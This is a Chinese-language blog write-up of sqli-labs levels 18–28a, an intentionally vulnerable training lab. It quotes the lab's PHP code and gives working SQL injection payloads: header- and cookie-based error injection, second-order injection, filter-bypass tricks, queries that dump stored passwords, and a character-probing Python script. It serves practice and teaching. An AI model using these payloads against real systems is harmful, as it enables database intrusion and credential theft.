Mamor's Blog
0%

sqli-labs2

发表于 更新于 分类于
本文字数: 14k 阅读时长 ≈ 13 分钟

18 UA注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<? php

function check_input($value)
    {
    if(!empty($value))
        {
        $value = substr($value,0,20); // truncation (see comments)
        }
        if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
            {
            $value = stripslashes($value);
            }
        if (!ctype_digit($value))       // Quote if not a number
            {
            $value = "'" . mysql_real_escape_string($value) . "'";
            }
    else
        {
        $value = intval($value);
        }
    return $value;
    }

check_input()函数先截取前20位,

如果开启GPC,去掉反斜杠,

如果是十进制,有非法字符再转译掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
  $result1 = mysql_query($sql);
  $row1 = mysql_fetch_array($result1);
      if($row1)
          {
          echo '<font color= "#FFFF00" font size = 3 >';
          $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
          mysql_query($insert);
          //echo 'Your IP ADDRESS is: ' .$IP;
          echo "</font>";
          //echo "<br>";
          echo '<font color= "#0000ff" font size = 3 >';            
          echo 'Your User Agent is: ' .$uagent;
          echo "</font>";
          echo "<br>";
          print_r(mysql_error());            
          echo "<br><br>";
          echo '<img src="../images/flag.jpg"  />';
          echo "<br>";
          
          }
      else
          {
          echo '<font color= "#0000ff" font size="3">';
          //echo "Try again looser";
          print_r(mysql_error());
          ... ...

这里对usernamepassword做了处理,但没有对UA处理 这里使用UA·

burp suite抓包改UA 1' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

19 Referer注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$uname = check_input($_POST['uname']);
  $passwd = check_input($_POST['passwd']);
  ... ...

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
  $result1 = mysql_query($sql);
  $row1 = mysql_fetch_array($result1);
      if($row1)
          {
          echo '<font color= "#FFFF00" font size = 3 >';
          $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
          mysql_query($insert);
          //echo 'Your IP ADDRESS is: ' .$IP;
          echo "</font>";
          //echo "<br>";
          echo '<font color= "#0000ff" font size = 3 >';            
          echo 'Your Referer is: ' .$uagent;

改Referer 1' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

20 Cookie注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);
    


    
    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    $cookee = $row1['username'];
        if($row1)
            {
            echo '<font color= "#FFFF00" font size = 3 >';
            setcookie('uname', $cookee, time()+3600);    
            header ('Location: index.php');
            echo "I LOVE YOU COOKIES";
            echo "</font>";
            echo '<font color= "#0000ff" font size = 3 >';            
            //echo 'Your Cookie is: ' .$cookee;
            echo "</font>";
            echo "<br>";
            print_r(mysql_error());            
            echo "<br><br>";
            echo '<img src="../images/flag.jpg" />';
            echo "<br>";
            }
        else
            {
            echo '<font color= "#0000ff" font size="3">';
            //echo "Try again looser";
            print_r(mysql_error());

改Cookie

uname=1.9' and 1=1 union select 1,2,table_name from information_schema.tables where table_schema='security' limit 0,1 #或者

uname=1' and updatexml(1,concat(0x7e,(select * from ( select concat(username,password) from users limit 0,1)a),0x7e),1)#



21

1
2
3
4
5
6
7
8
9
10
11
if(!isset($_POST['submit']))
    {
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        ... ...

        $cookee = base64_decode($cookee);
        $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
        
        ... ...

和20关相比,多了base64编码 ,这个使用')闭合

uname=1') and updatexml(1,concat(0x7e,(select * from ( select concat_ws(':',username,password) from users limit 0,1)a),0x7e),1)# base64一下

MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0ICogZnJvbSAoIHNlbGVjdCBjb25jYXRfd3MoJzonLHVzZXJuYW1lLHBhc3N3b3JkKSBmcm9tIHVzZXJzIGxpbWl0IDAsMSlhKSwweDdlKSwxKSM=

22

1
2
3
4
5
6
7
if(!isset($_POST['submit']))
        {
            $cookee = $_COOKIE['uname'];
            ... ... 
            $cookee = base64_decode($cookee);
            $cookee1 = '"'. $cookee. '"';
            $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

"闭合,其余和21相同


23 #```--被过滤 单引号闭合 报错注入

1

#--被过滤了 使用'闭合

?id=1' and '1'='1

?id=1'%20 order by 5 and '1'='1无法通过这种方式判断字段数

?id=-1' union select 1,2 and '1'='1报错

?id=-1' union select 1,2,3 and '1'='1不报错

?id=-1' union select 1,2,3 and '1'='1报错

可以判断有三个字段,2,3是回显点,但是3处输出结果只有0和1,估计是布尔型,所以把2当作输出点

当然这里亦可以使用报错注入,相对简单点

?id=-1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1



24 二次注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# pass_change.php

<?php

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

if (isset($_POST['submit']))
{
    
    # Validating the user input........
    $username= $_SESSION["username"];
    $curr_pass= mysql_real_escape_string($_POST['current_password']);
    $pass= mysql_real_escape_string($_POST['password']);
    $re_pass= mysql_real_escape_string($_POST['re_password']);
    
    if($pass==$re_pass)
    {    
        $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
        $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
        $row = mysql_affected_rows();
        echo '<font size="3" color="#FFFF00">';
        echo '<center>';
        if($row==1)
        {
            echo "Password successfully updated";
        }
        else
        {
            header('Location: failed.php');
            //echo 'You tried to be smart, Try harder!!!! :( ';
        }
    }
    else
    {
        echo '<font size="5" color="#FFFF00"><center>';
        echo "Make sure New Password and Retype Password fields have same value";
        header('refresh:2, url=index.php');
    }
}
?>
<?php
if(isset($_POST['submit1']))
{
    session_destroy();
    setcookie('Auth', 1 , time()-3600);
    header ('Location: index.php');
}
?>

update在修改密码时,$username直接获取session 并没有做任何过滤处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#login.php
<? php
...

function sqllogin(){

   $username = mysql_real_escape_string($_POST["login_user"]);
   $password = mysql_real_escape_string($_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
   $res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
   $row = mysql_fetch_row($res);
    //print_r($row) ;
   if ($row[1]) {
            return $row[1];
   } else {
              return 0;
   }

}


$login = sqllogin();
if (!$login== 0) 
{
    $_SESSION["username"] = $login;
    setcookie("Auth", 1, time()+3600);  /* expire in 15 Minutes */
    header('Location: logged-in.php');
} 
else
{ ... ...

当成功登录时,$_SESSION["username"]直接取出使用,并没有过滤,所以这里的$username是可控变量



先注册一个admin'#账号 随便设置一个密码123456,登录后修改密码为12345

使用admin 再次登录发现原密码admin被改成12345


25 or and被过滤

1
2
3
4
5
6
7
8
9
10
11
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";



function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}

根据图片提示,orand被过滤了 使用'闭合

?id=1' --+

?id=1.99' aandnd 1=1 union select 1,2,3%20 --+ 2,3为输出点

或者 ?id=1.99' aandnd 1=1 union select 1,2,3%20 anandd '1'='1

虽然被过滤掉了,但可以使用双写绕过


25a or and被过滤

1
2
3
4
5
6
7
8
9
10
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";


function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}


和25相比 少了'

?id=1 oorrder by 3

?id=0 union select 1,database(),3


26 or/and/*/-/#/空格和斜杠被过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
	$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out / *
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests

def changeToHex(num):
    tmp = hex(i).replace("0x", "")
    if len(tmp)<2:
        tmp = '0' + tmp
    return "%" + tmp

req = requests.session()
for i in xrange(0,256):
    i = changeToHex(i) 
    url = "http://localhost/sqli-labs/Less-26/?id=1'" + i + "%26%26" + i + "'1'='1"     
    ret = req.get(url)
    if 'Dumb' in ret.content:
        print "good,this can use:" + i
        
#good,this can use:%09
#good,this can use:%0a
#good,this can use:%0b
#good,this can use:%0c
#good,this can use:%0d
#good,this can use:%20
#good,this can use:%22
#good,this can use:%23
#good,this can use:%27
#good,this can use:%2a
#good,this can use:%2d
#good,this can use:%2f
#good,this can use:%5c

%20(空格)、%23(#)、%2a(*)、%2d(-)、%2f(/)、%5c(\),%09-%0d都是制表符、换行符、换页符

但是这个题在linux环境下可以解析%a0windows下就无法解析

这一关有三种注入方式:

  • union select 联合注入,用特殊编码符代替空格
  • 报错注入,为了避开空格,选择使用updatexml()extractvalue()
  • Bool盲注,构造避开空格的语句

使用||替换and

?id=1'||'1'='1

?id=0'||updatexml(1,concat(0x7e,(database()),0x7e),1)||'1'='1

?id=0'||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security')),0x7e),1)||'1'='1


26a or/and/*/-/#/空格和斜杠被过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
	$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
	
	function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		//strip out / *
	$id= preg_replace('/[--]/',"", $id);		//Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

?id=1')||('1'='1



27 */-/#/空格/*/union/select被过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
	$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
	
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out / *
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out select
return $id;
}

?id=0%27%a0unIon%a0sElect%a01,2,%273

?id=0%27%a0unIon%a0sElect%a01,(sElect%a0group_concat(password)from%a0users)%20,%273



27a */-/#/空格/*/union/select被过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
	$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
	
	
	function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out / *
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out Select
return $id;
}

?id=1" ||"1"="1 双引号闭合

?id=0%22%20UnIon%a0SeLect%a01,2,3%22

?id=0%22%20UnIon%a0SeLect%a01,(SeLect%a0group_concat(password)from%a0users),3%22


28*/-/#/+/空格/union/select被过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
	$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
	
	
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);				//strip out / *
$id= preg_replace('/[--]/',"", $id);				//Strip out --.
$id= preg_replace('/[#]/',"", $id);					//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
//$id= preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out UNION & SELECT.
return $id;
}

id=0%27)%a0UnIon%a0SEleCt%a01,2,(%273


28a */-/#/+/空格/union/select被过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
	$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
	
	
function blacklist($id)
{
//$id= preg_replace('/[\/\*]/',"", $id);				//strip out / *
//$id= preg_replace('/[--]/',"", $id);				//Strip out --.
//$id= preg_replace('/[#]/',"", $id);					//Strip out #.
//$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
//$id= preg_replace('/select/m',"", $id);	   		 	//Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id);	    		//Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);	    //Strip out spaces.
return $id;
}


id=0%27)%a0UnIon%a0SEleCt%a01,2,(%273

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------